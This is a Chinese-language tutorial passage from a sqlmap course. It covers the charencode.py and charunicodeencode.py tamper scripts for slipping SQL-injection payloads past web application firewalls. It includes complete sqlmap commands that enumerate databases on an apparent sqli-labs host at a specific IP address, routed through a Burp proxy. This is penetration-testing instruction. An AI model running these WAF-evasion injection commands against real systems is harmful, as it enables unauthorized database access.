sqlmap从入门到精通-第七章-7-4 绕过WAF脚本-charencode.py&charunicodeencode.py

8. charencode.py脚本

对所有的payload字符进行全部的url编码，已经编码的不处理，具体看如下演示

实战演示：

测试地址：python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="charencode.py" --proxy="http://127.0.0.1:8080" -batch

下面的演示的效果图：

 

 发现是可以注入的，我们查看burp的抓包效果

 -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

9. charunicodeencode.py脚本

对使用的payload非编码字符使用UnicodeURL编码，已经编码的不处理，这个跟上面提到的charencode.py脚本的区别就是在编码中增加了"u00" ,适用于所有数据库，具体看如下演示

实战演示：

测试地址：python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="charunicodeencode.py" --proxy="http://127.0.0.1:8080" -batch

下面的演示的效果图：

 发现并不能注入成功，查看下burp抓包的情况

 

 可以看到都添加了u00